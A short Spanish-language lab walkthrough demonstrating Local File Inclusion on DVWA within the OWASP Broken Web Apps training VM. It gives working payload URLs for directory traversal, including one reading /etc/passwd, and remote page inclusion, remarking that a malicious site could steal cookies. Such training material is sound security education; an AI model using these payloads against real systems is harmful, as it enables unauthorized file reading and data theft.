Vamos a identificar la vulnerabilidada LFI
Local File Inclusion
Usamos el sistema OWASP Broken Web Apps
Abrimos un navegador y vamos a
http://192.168.1.109/dvwa/
ponemos credenciales
admin
admin
vamos al apartado File Inclusion
vemos que la URL es
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=include.php
cambiamos el parametro page
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=index.php
Esto nos indica que no existe un archivo index.php
y que puede ser posible que exista la vulnerabilidad LFI
probamos anteponiendo dos puntos y la barra diagonal
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=../../index.php
quiere decir que vamos a subir 2 niveles y deberiamos ver el index de
http://192.168.1.109/dvwa/
Como vemos funciona y la vulnerabilidad esta presente
Vamos a explotarla un poco poniendo
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=http://192.168.1.109/vicnum/index.html
se puede incluir cualquier otra pagina web, podria ser una web maliciosa
para robar cookies o informacion mas valiosa.
probemos
http://192.168.1.109/dvwa/vulnerabilities/fi/?page=../../../../etc/passwd
;)
happy hacking